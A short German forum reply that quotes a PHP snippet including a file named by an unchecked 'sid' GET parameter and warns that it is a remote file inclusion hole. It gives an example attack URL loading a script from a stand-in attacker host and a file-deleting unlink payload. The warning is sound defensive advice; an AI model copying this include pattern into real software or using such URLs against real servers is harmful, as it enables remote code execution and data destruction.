Hallo,

<?
if (isset($_GET['sid']))
{
    $seite = $_GET['sid'];
}
else
{
    $seite = "button.php";
}
include $seite;
?>

*grmpf*

Das ist die dann die schlimmste denkbare Sicherheitslücke, die man überhaupt einbauen kann (wenn diese Möglichkeit vom Hoster nicht unterbunden wurde)!

Damit kann jeder beliebigen PHP-Code auf deinem Server ausführen und wird geradezu eingeladen, es zu versuchen.

Du müsstest die Seite nur so aufrufen:

http://seite.tld?sid=http://boesermensch.tld/boesesscript.txt

Und in boesesscript.txt steht dann vielleicht einfach:

unlink("index.php");

Oder andere schlimme Sachen, die vielleicht nichtmal so schnell auffallen.
Dieser Code wird dann auf deinem Server ausgeführt.
Richtig übel!

Gruß, Jan